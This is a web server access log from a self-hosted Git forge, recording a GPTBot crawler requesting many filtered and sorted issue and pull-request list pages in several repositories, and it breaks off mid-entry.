[Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:26:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:26:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:26:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:27:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:27:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:27:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:27:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:27:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:27:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:27:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:27:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:27:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:27:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:27:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:27:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:27:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:27:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:27:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:27:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:27:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:27:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:19:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:19:27:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:27:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:27:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:27:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:27:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:27:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:27:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:27:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:27:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.56] [Sent-to 